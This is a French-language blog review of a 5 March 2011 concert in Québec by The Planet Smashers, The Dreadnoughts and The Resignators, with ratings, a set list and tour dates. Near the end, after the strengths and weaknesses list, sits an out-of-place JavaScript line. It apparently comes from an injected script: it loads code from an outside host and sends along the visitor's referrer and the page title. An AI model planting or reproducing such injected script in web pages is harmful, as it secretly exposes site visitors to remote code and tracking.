Spectacle de The Planet Smashers + The Dreadnoughts + The Resignators au Cercle à Québec : 5 mars 2011


Facebooktwitterredditpinterestlinkedinmail

The Planet Smashers (3/5)

(Pour les fans de The Mighty Mighty Bosstones, Streetlight Manifesto, Less Than Jake, NOFX)

Les montréalais sur Stomp Records, The Planet Smashers, ont su animer la foule comme à leur habitude. Le groupe ska formé en 1994 et composé de Matt Collyer (guitare et voix), Andrew Lattoni (Trombone), Neil « Lonestar » Johnson (Saxophone), Dave Cooper (Basse) et Fred Brenton (Drum), à attirer des centaines de personnes au Cercle ce samedi soir.

Les membres du groupe nous ont joué presque tout leurs bons classiques. Nous avons même eu droit à l’écoute une nouvelle chanson, qui se nomme Do The Hippopotamus ou tout simplement Hippopotamus. Elle se retrouvera sur leur nouvel album qui devrait d’ailleurs sortir en juin 2011. Un album de plus à leurs cordes déjà bien garnies et fort probablement très attendu par leurs fans, étant donné qu’il y a déjà presque 6 ans qui nous sépare du dernier album Unstoppable. Le nouveau disque dont le nom m’est inconnu jusqu’à maintenant, s’ajoutera à la bonne quantité de CDs et demo déjà bien connus et appréciés tels que Meet The Planet Smashers (demo-1994), The Planet Smashers (1995), Inflate To 45 RPM (vinyl-1995), Attack of The Planet Smashers (1997), Life of The Party (1999), No Self Control (2001), Mighty (2003) et Unstoppable (2005). De plus, ils avaient tourné un DVD en 2004 au nom de TEN.

Pour ma part, j’apprécie toujours voir ce groupe en spectacle, car leur musique ska très entraînante nous donne envie de danser. Par contre, je suis déçue à chaque fois de voir que les Planet Smashers roulent le même show depuis plusieurs années. Oui, on les aime les vieilles chansons, mais jusqu’à un certain point. Nous voulons du renouveau, c’est-à-dire que les membres doivent être créatifs, renouveler un peu le matériel et faire de nouveaux shows, parce que sinon les vieux fans se tannent. C’est ce qui m’arrive présentement. Lorsque tu prédis les chansons qu’ils vont jouer avec une presqu’exactitude, c’est signe que le groupe est du pour innover. Bref, sa enlève pas le mérite du groupe montréalais qui demeure très bon et qui attire des tonnes de gens. Chaque fois qu’on les voit, on a du plaisir, on s’amuse et on ne veut pas que sa s’arrête. Dès la première chanson, le Bar Le Cercle était dans un mouvement « skank » incroyable, au point où même le plafond de la salle suait de chaleur et d’intensité. Voici la prochaine date d’annoncer pour un spectacle des Planet Smashers :

25 MARS 2011 • Toronto, ON • Phoenix Concert Theatre w/The Johnstones & Saint Alvia

 

Set List :

She’s So Hot

Fabricated

Missionnary’s Downfall

Too Much Attitude

Swayed

Life of The Party

Bullet To The Ground

Mission Aborded

Hippopotamus (nouvelle)

All Men Fear Women

Surfing In Tofino

My Decision

Blind

I Like Your Girlfriend

Girl In The Front Row

Raise Your Glass

Pee In The Elevator

Super Orgy Porno Party (Rappel #1)

Skate Or Die (Rappel #2)

http://www.planetsmashers.net/

http://www.myspace.com/planetsmashers

The Dreadnoughts (5/5)

(Pour les fans de Flogging Molly, Dropkick Murphys, The Real McKenzies)

 

Que dire de The Dreadnoughts? W-O-W!! Mais quelle énergie sur scène! Le groupe formé en 2006 à Vancouver en a épaté plus d’un ce samedi soir. Ils semblaient très attendus par les fans finis de ce groupe et on comprend pourquoi. The Dreadnoughts, étant composé de Nicholas Smyth (guitare et vocals), Kyle Taylor (accordéon, violon et voix), Drew Sexsmith alias The Dread Pirate Druzil (Mandoline, Banjo et voix), Andrew Hay (basse) et finalement Marco Bieri (drums), ont su électriser Le Cercle. Ils ont donné une prestation épatante et je dois dire que sa faisait un bon moment que je n’avais pas vu un groupe qui donne un aussi bon spectacle. L’ambiance était parfaite; une prestation extraordinaire de tous les membres, des gens heureux, un peu de folie et une foule en feu. Un moment qui m’a bien plu et m’a bien faire rire est lorsqu’un membre du groupe a dit à la foule : « He’s thirsty! He needs a beer! », en parlant du drummer. Ce dernier est ensuite partie en bodysurfing jusqu’au bar pour recevoir sa bière et s’en retourner sur la scène. Beau Moment! En somme, tous les éléments y étaient pour nous faire apprécier le moment.

Le groupe folk punk signé sur Stomp Records, a joué plusieurs chansons de leur album nouvellement sortie en 2011, Polka’s Not Dead. Sur ce disque, nous pouvons entendre plusieurs chansons toutes aussi bonnes les unes que les autres et entre autres, la chanson Poutine qui nous représente bien ici au Québec. Cette chanson très attendue, écrite en français et en anglais, en a fait chanter et danser plus d’un. Les Dreadnoughts ont jusqu’à maintenant trois CDs, soit Polka’s Not Dead (2011), Victory Square (2009) et Legends Never Die (2007), ainsi qu’un 7inch EP paru en 2010, Cyder Punks Unite. Bref, un autre band à découvrir obligatoirement. Je crois sincèrement que le nouvel album sera dans mon top 10 de 2011. À voir et à découvrir si ce n’est pas déjà fait. Pour ceux ou celles que sa pourraient intéresser, qui les ont manqués ou qui voudraient les revoir, voici les prochaines dates de leur tournée canadienne :

6 MARS 2011 • Toronto, ON • Sneaky Dee’s (All Ages) w/Resignators – 19:00
16 MARS 2011 • Calgary, AB • SAIT – 19:00

17 MARS 2011 • Edmonton, AB • The Twisted Kilt Pub – 19:00
18 MARS 2011 • Edmonton, AB • The Twisted Kilt Pub – 19:00

19 MARS 2011 • Edmonton, AB • The Twisted Kilt Pub – 19:00

20 MARS 2011 • Jasper, AB • Downstream – 19:00

www.thedreadnoughts.com

http://www.myspace.com/vancitydreadnoughts/

 

The Resignators (4/5)

(Pour les fans de Reel Big Fish et de The Planet Smashers)

Ce groupe australien, plus précisément de Melbourne, a donné tout un spectacle ce samedi. Le groupe qui était de passage au Québec pour une tournée canadienne en vue de promouvoir leur deuxième album See You In Hell, en a fait danser plus d’un. Ce nouveau disque, sorti à la fin de l’année 2010, a été enregistré à Montréal auprès d’Alex Giguère, le chanteur de One Night Band et The Beatdown. Les australiens avaient une très belle énergie sur scène, étaient plutôt interactifs avec la foule et de plus, c’était très charmant de les voir essayer de nous parler en français. Le band, à tonalité ska, formé de Francis Harrison à la voix, Tom Dittman à la trompette, Naf à la basse, Ben à la batterie, Jonathon au trombone, Steve Douglas à la guitare et à la voix, et de Stacy Kilpatrick au clavier, a dû en impressionner plus d’un, à commencer par moi-même. J’avais pris connaissance un peu de leur matériel les jours précédents le spectacle et j’ai adoré ce que j’ai entendu. Je dois également dire que sur scène, ils sont tout aussi bon et donne une très bonne prestation. Pour avoir parlé avec quelques uns d’entre eux à la fin du show, les membres sont tous très gentils, sociables et respectueux. The Resignators sont sur Stomp Records parmi toute la belle palette de bons groupes sur ce label, tels que Big D and The Kids Table, The Flatliners, The Planet Smashers, The Aggrolites, etc.

Le groupe qui existe depuis 2005 a plus d’un album à son actif. En effet, ils ont deux CDs, soit le récent See You In Hell (2010) et Time Decays (2008). De plus, ils ont deux EPs, dont You Got Me Thinking (2006) et Offbeat Feeling (2006). D’ailleurs pour ceux et celles que cela pourrait intéresser, il y a le EP You Got Me Thinking qui est disponible en téléchargement gratuit sur Bandcamp à l’adresse suivante : http://theresignators.bandcamp.com/album/you-got-me-thinking. Pour ce qui est des autres albums, je vous conseille fortement de les acheter, le groupe mérite amplement d’être connu. Pour ceux ou celles qui se découvre un amour véritable pour le groupe, la tournée se poursuit au Canada et voici les prochaines dates :

06 MARS 2011 • Toronto, ON • Sneaky Dee’s (All Ages) – 19 :00PM
12 MARS 2011 • Toronto, ON • « Aussie BBQ » Horseshoe Tavern – 13 :00PM
12 MARS 2011 • Toronto, ON • CMW SHOWCASE The Hideout- 2 :00AM

http://www.theresignators.com/

www.myspace.com/theresignators

En résumé, le spectacle en entier fut une belle réussite. Que de bons groupes, d’ambiance enivrante, de sourires, de danse, de bonnes prestations, de bonnes bières et de gens sympathiques. Bref tout était en place pour une soirée parfaite.

Cote général du spectacle: 4/5

Points forts ++++

♫ La prestation électrisante de The Dreadnoughts

♫ La découverte de The Resignators

♫ Le bar rempli presque qu’au-delà de sa capacité légale

♫Le ¾ de la foule qui danse et chante

♫Les Planet Smashers qui font Girl In The Front Row (alors qu’ils ne la jouent presque jamais en spectacle)

Points faibles —-

♫ Le setlist des Planet Smashers

♫ Le plafond qui coule de sueur

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Ultimradio à Cradle Of Filth !!!
Next DBLBall : Semaine du 8 mars

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *